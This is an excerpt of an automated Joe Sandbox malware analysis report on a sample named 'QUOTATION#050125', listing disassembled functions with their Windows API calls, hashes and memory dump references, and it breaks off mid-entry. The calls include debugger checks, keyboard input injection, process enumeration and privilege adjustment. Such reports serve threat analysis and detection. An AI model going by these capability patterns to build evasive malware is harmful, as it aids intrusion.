                                                                                      • API String ID: 0-2761157908
                                                                                      • Opcode ID: 34d9f2d45f9533c6b358f12e7917ce322b9070a1e395aa0335b0c3b43628a890
                                                                                      • Instruction ID: facc1f046acf5843595898a69fe43feaab5f4c898d87d0ecd95efaec6ec0be1b
                                                                                      • Opcode Fuzzy Hash: 34d9f2d45f9533c6b358f12e7917ce322b9070a1e395aa0335b0c3b43628a890
                                                                                      • Instruction Fuzzy Hash: A4C25872E086298FDB64CE28DD407FAB7B5EB44304F1441EADA0DE7651E778AE819F40
                                                                                      Function 0014A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0014A6AC
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0014A6BA
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0014A79C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014A7AB
                                                                                        • Part of subcall function 000DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00103303,?), ref: 000DCE8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 2000298826-0
                                                                                      • Opcode ID: 0df2ea767849c457e8768d4ae310ce6a7a5b98d3fa5fb954d4ad4c969ecfeed4
                                                                                      • Instruction ID: e16b1ae372f47376193db9afcd8ea7ffa8e1e89b6d6fe7ad8de9fb20bd11fbfc
                                                                                      • Opcode Fuzzy Hash: 0df2ea767849c457e8768d4ae310ce6a7a5b98d3fa5fb954d4ad4c969ecfeed4
                                                                                      • Instruction Fuzzy Hash: 895108715083019FD710DF24C886EAEBBE8FF89754F40491DF59A972A2EB31D905CBA2
                                                                                      Function 0012AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0012AAAC
                                                                                      • SetKeyboardState.USER32(00000080), ref: 0012AAC8
                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0012AB36
                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0012AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 0db559f4b03878ec7e1a2c6d28bd689e3a5a77039898dc7a9b1ca5d4e7bf34da
                                                                                      • Instruction ID: 54da06744b220e1ca42f67a3b4830adb48a13c7bbdabfeab80d90d2aa51dc230
                                                                                      • Opcode Fuzzy Hash: 0db559f4b03878ec7e1a2c6d28bd689e3a5a77039898dc7a9b1ca5d4e7bf34da
                                                                                      • Instruction Fuzzy Hash: C6314B30A40328AFFF35CB68EC05BFE7BA6AF54310F84421AF581961D0D37599A5C7A2
                                                                                      Function 0013CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0013CE89
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0013CEEA
                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 0013CEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 234945975-0
                                                                                      • Opcode ID: 9f5d1874e3ce7b65695395cc492a0232441eb43523e312183c6b285455f70680
                                                                                      • Instruction ID: c6be232bac8370517148c79276cf7bdb498aca5f1b8d4203b6c2f6c7288562ea
                                                                                      • Opcode Fuzzy Hash: 9f5d1874e3ce7b65695395cc492a0232441eb43523e312183c6b285455f70680
                                                                                      • Instruction Fuzzy Hash: 6A21BAB1500705EFEB20DFA5C948BAABBFCEB40358F10442EE646A6151E770EE448BA0
                                                                                      Function 000E083F Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000E084B
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 000E0916
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 000E0936
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 000E0940
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: 0b1f7405c5ebe7c74b7d89d655892405144399323b08c135b2812fac97f86357
                                                                                      • Instruction ID: bc782dd6fdf55923674a85959408f767190cc528a758b38a7cabc18be9040cc7
                                                                                      • Opcode Fuzzy Hash: 0b1f7405c5ebe7c74b7d89d655892405144399323b08c135b2812fac97f86357
                                                                                      • Instruction Fuzzy Hash: 23312775D0135CDFDB20EFA5D9897CDBBB8AF18300F1041AAE408AB251EBB45A848F45
                                                                                      Function 0012DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,00105222), ref: 0012DBCE
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0012DBDD
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0012DBEE
                                                                                      • FindClose.KERNEL32(00000000), ref: 0012DBFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2695905019-0
                                                                                      • Opcode ID: def91458aadf37262f6dc29bf64214f0161d874ae701f306d898c94f327c03a1
                                                                                      • Instruction ID: c370d8df1162d1e897619221db79ca135d4e1cc66fae14f974dc8b436ed284cc
                                                                                      • Opcode Fuzzy Hash: def91458aadf37262f6dc29bf64214f0161d874ae701f306d898c94f327c03a1
                                                                                      • Instruction Fuzzy Hash: B1F0A030810B209B82246F78FC0D8AA376D9F02336B10470AF836D24E0EBB059B4C6D6
                                                                                      Function 000E0C21 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E0D40,0015FE34,00000017), ref: 000E0C26
                                                                                      • UnhandledExceptionFilter.KERNEL32(0015FE34,?,000E0D40,0015FE34,00000017), ref: 000E0C2F
                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,000E0D40,0015FE34,00000017), ref: 000E0C3A
                                                                                      • TerminateProcess.KERNEL32(00000000,?,000E0D40,0015FE34,00000017), ref: 000E0C41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 3231755760-0
                                                                                      • Opcode ID: a8efd84882c4c2f81154ba2c652d1521ad788c6577092ca437f3f78bfccea109
                                                                                      • Instruction ID: 5bfd3bf9d8a4dd6a11e52e044fc0efa008a1c135e330f5a2cd407f5934d7c015
                                                                                      • Opcode Fuzzy Hash: a8efd84882c4c2f81154ba2c652d1521ad788c6577092ca437f3f78bfccea109
                                                                                      • Instruction Fuzzy Hash: 3AD0EA7204430CEFDA802FE1EC0DA697F68BB19A57F088450F70ACA862DA7155918BE6
                                                                                      Function 00128298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001282AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: ($|
                                                                                      • API String ID: 1659193697-1631851259
                                                                                      • Opcode ID: 33d203fba6ed5718d4a4644130a92062c1e739db583ce0dc3777b78ff891ef3c
                                                                                      • Instruction ID: de142dacf061b0bcea1a70d23d5400b6179f202124812df7364798c8645f5f2e
                                                                                      • Opcode Fuzzy Hash: 33d203fba6ed5718d4a4644130a92062c1e739db583ce0dc3777b78ff891ef3c
                                                                                      • Instruction Fuzzy Hash: 78323474A007159FCB28CF19D481AAAB7F0FF48710B15C46EE49ADB3A1EB70E991CB50
                                                                                      Function 000FB952 Relevance: 4.9, APIs: 3, Instructions: 370timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00163700), ref: 000FBB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0019121C,000000FF,00000000,0000003F,00000000,?,?), ref: 000FBC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00191270,000000FF,?,0000003F,00000000,?), ref: 000FBC36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$InformationTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 1904278450-0
                                                                                      • Opcode ID: c2235ffe8cdff44366b8681d5e4e3ac3b95a2be03963ab8625900bb55f7d4aa1
                                                                                      • Instruction ID: 60b8a71aa092daf4b1a40c9b633c957adf44d5ce45a93aff0c6c1180416903d2
                                                                                      • Opcode Fuzzy Hash: c2235ffe8cdff44366b8681d5e4e3ac3b95a2be03963ab8625900bb55f7d4aa1
                                                                                      • Instruction Fuzzy Hash: 3CC12A7190420DAFCB20EF69DC51ABE7BE9EF41310F24415AE650D7952E7709E41EF90
                                                                                      Function 00135C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00135CC1
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00135D17
                                                                                      • FindClose.KERNEL32(?), ref: 00135D5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 4f09f6e2d1659b9dc48a536e5ab4853106427d38369eb1dc1f74c20be69ee89d
                                                                                      • Instruction ID: d6588f328656fa5a9ff5216632ccc0ed825dc2bc19ce010cfd1c18eca090a039
                                                                                      • Opcode Fuzzy Hash: 4f09f6e2d1659b9dc48a536e5ab4853106427d38369eb1dc1f74c20be69ee89d
                                                                                      • Instruction Fuzzy Hash: 19518874604B019FC718CF68C494E9AB7E5FF49324F14855EE99A8B3A2CB30ED45CB91
                                                                                      Function 000F2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 000F271A
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000F2724
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 000F2731
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 2ed8c6f8099ee39833d07d86007028c6d7428354f2c686701a00e6e74d1fa1a6
                                                                                      • Instruction ID: 503d0e49cdbd4f5d9859389cdbedd17b651b57b5171377a6f43db7bef4a3651d
                                                                                      • Opcode Fuzzy Hash: 2ed8c6f8099ee39833d07d86007028c6d7428354f2c686701a00e6e74d1fa1a6
                                                                                      • Instruction Fuzzy Hash: 2F31B47491131CDBCB61EF65DC897D9B7B8AF18310F5041EAE41CA6261E7709F818F45
                                                                                      Function 001351CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 001351DA
                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00135238
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 001352A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                      • String ID:
                                                                                      • API String ID: 1682464887-0
                                                                                      • Opcode ID: a8780a57debadbba4af31378951155e5a176dba3d900d20c5deed2668e0a30b7
                                                                                      • Instruction ID: da583d01b93b81c1d22b092f28e4ab961b2920ed3efca2804f5f2d6a22019db5
                                                                                      • Opcode Fuzzy Hash: a8780a57debadbba4af31378951155e5a176dba3d900d20c5deed2668e0a30b7
                                                                                      • Instruction Fuzzy Hash: B6312F75A00618DFDB00DF54D884FAEBBB5FF49314F448099E8099B352DB71E856CB90
                                                                                      Function 001216C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0012170D
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0012173A
                                                                                      • GetLastError.KERNEL32 ref: 0012174A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                      • String ID:
                                                                                      • API String ID: 4244140340-0
                                                                                      • Opcode ID: 52ba3a08c991e767019e25994730ab2c6d764abcb9f1367d7babd09cc3bc4253
                                                                                      • Instruction ID: dd6456e5fb9edd36784c2567934c126a314c7690a2b819000fe6adbe30d57025
                                                                                      • Opcode Fuzzy Hash: 52ba3a08c991e767019e25994730ab2c6d764abcb9f1367d7babd09cc3bc4253
                                                                                      • Instruction Fuzzy Hash: 4F1191B2404305BFD718DF54EC86DABB7BAEB44725B20852EF05657641EB70BC51CA60
                                                                                      Function 0012D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0012D608
                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0012D645
                                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0012D650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 33631002-0
                                                                                      • Opcode ID: dc30ee7cee2f6e1cc73734792fcc4bf832d1de54d8b1fc552a12676bb6fb3753
                                                                                      • Instruction ID: 175c35e730bdfe0af6229cc78e2c436d0b275f9c6f266c8003388e706aa71db5
                                                                                      • Opcode Fuzzy Hash: dc30ee7cee2f6e1cc73734792fcc4bf832d1de54d8b1fc552a12676bb6fb3753
                                                                                      • Instruction Fuzzy Hash: D4112A75A05328BFDB108F95EC45BAFBBBCEB45B50F108115F914A7290D6704A058BE1
                                                                                      Function 00121663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0012168C
                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001216A1
                                                                                      • FreeSid.ADVAPI32(?), ref: 001216B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                      • String ID:
                                                                                      • API String ID: 3429775523-0
                                                                                      • Opcode ID: 76124bd3b3aa1ffe34d436ba771debc7ec2139a71cf29ea34f3be660b1919f2e
                                                                                      • Instruction ID: 9755391efd243871cd512cf0776f58ce490adcc57a80c436b7057bc31fb146d8
                                                                                      • Opcode Fuzzy Hash: 76124bd3b3aa1ffe34d436ba771debc7ec2139a71cf29ea34f3be660b1919f2e
                                                                                      • Instruction Fuzzy Hash: F1F0F475950309FFDB00DFE49C89AAEBBBCFB08605F504565E501E6181E774AA848A90
                                                                                      Function 000E4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(000F28E9,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002,00000000,?,000F28E9), ref: 000E4D09
                                                                                      • TerminateProcess.KERNEL32(00000000,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002,00000000,?,000F28E9), ref: 000E4D10
                                                                                      • ExitProcess.KERNEL32 ref: 000E4D22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 66f8686cbf4736b9a9c41be0c083c6917ea6fb9b471e8d7654a85c7517337271
                                                                                      • Instruction ID: 7de24a0c3dc984b89390039695ef4fcf811715bcdd8066b4b8912559b1620468
